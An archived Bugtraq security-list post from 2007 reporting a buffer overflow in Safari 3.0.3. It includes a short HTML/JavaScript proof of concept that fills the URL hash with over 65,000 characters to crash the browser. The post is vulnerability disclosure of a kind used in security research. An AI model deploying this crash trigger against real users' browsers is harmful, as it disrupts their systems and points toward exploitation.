Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq: Safari 3.0.3 (522.15.5) Buffer overflow

Safari 3.0.3 (522.15.5) Buffer overflow

From: <azizov_at_itdefence.ru>
Date: 7 Sep 2007 16:28:06 -0000

('binary' encoding is not supported, stored as-is) Azizov E. (azizov_at_itdefence.ru)

1. At processing of data, which has more than 65474 bytes in size, occurs buffer overflow.

POC:

<html>
<body>
<script>
var maxbuf = 65474;

buff = "A";
for (i=0;i<maxbuf;i++) { buff = buff+"A"; }
document.location.hash = buff+"BOW! ";
alert(document.location.hash);
</script>
</body>
</html>
Received on Sep 07 2007

This message: [ Message body ]
Next message: Adrian P: "Re: Buffalo AirStation WHR-G54S CSRF vulnerability"
Previous message: security_at_mandriva.com: "[ MDKSA-2007:177 ] - Updated MySQL packages fix vulnerabilities"

Contemporary messages sorted: [ by date ] [ by thread ] [ by subject ] [ by author ] [ by messages with attachments ]